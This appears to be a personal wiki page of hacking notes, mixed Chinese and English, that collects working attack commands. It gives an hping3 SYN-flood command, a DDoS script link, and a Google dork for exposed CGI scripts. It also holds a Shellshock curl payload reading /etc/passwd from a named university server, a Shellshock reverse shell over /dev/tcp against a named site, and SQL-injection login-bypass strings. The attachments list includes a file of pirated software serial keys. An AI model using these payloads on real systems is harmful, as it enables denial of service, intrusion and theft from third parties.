A notes for being a hacker
更多文章
TryHackMe
Hack The Box
hping3
hping3 -S --flood -V www.hping3testsite.com
https://github.com/Ha3MrX/DDos-Attack
python ddos-attack.py
Release Date: 2016/10/19
Introduction to the vulnerability
如果主機有開放一般帳號可存取 shell,透過這個漏洞
NOTE:即使系統沒有開放 shell,攻擊者仍可以透過其他漏洞先取得 shell 存取後,再進行這個漏洞的攻擊。
RedHat 官網資訊
攻擊工具
Resolution
Scanning the target with Google
inurl:cgi-bin filetype:sh site:edu inurl:/cgi-bin/ ext:sh
Attempt to get the username remotely
curl -A "() { :;}; echo Content-type:text/plain;echo; /bin/cat /etc/passwd " http://www.physics.csbsju.edu/cgi-bin/stats/dir.sh
Reverse SHELL
> php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c ls
if it response as 'Command sent to the server!', continue with the follows
> nc -lp 4444 -vv Waiting untill the PHP command is completed. If all goes well, you can issue any commands here.
Open another terminal. issue the command
> php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/here.is.my.IP/4444 0>&1"
cd /pentest/web/nikto perl nikto.pl -host 123.123.123.123
Checking if the Login form with SQL Injection
http://www.joellipman.com/articles/w...abilities.html
// Username admin' -- admin' # admin'/* // Password ' or 1=1-- ' or 1=1# ' or 1=1/* ') or '1'='1-- ') or ('1'='1--
文件 | 大小 | 日期 | 附件上傳者 | |||
---|---|---|---|---|---|---|
50+_Serial_Keys_For_Popular_Software.txt Serial Keys | 17.33 KB | 16:16, 5 Jun 2013 | alang | 動作 | ||
bash.php Hacking for Shellshock | 1619 位元 | 20:01, 27 Sep 2014 | alang | 動作 | ||
Dangerous Google - Searching For Secrets.pdf Dangerous Google - Searching For Secrets | 2.11 MB | 15:35, 18 May 2013 | alang | 動作 | ||
HowToBeAnAnonymous.txt How to be an anonymous | 4.43 KB | 17:11, 24 May 2013 | alang | 動作 | ||
XSS & SQL Injection實作.pdf 無描述 | 3.06 MB | 18:16, 6 Feb 2013 | alang | 動作 |
Images 0 | ||
---|---|---|
No images to display in the gallery. |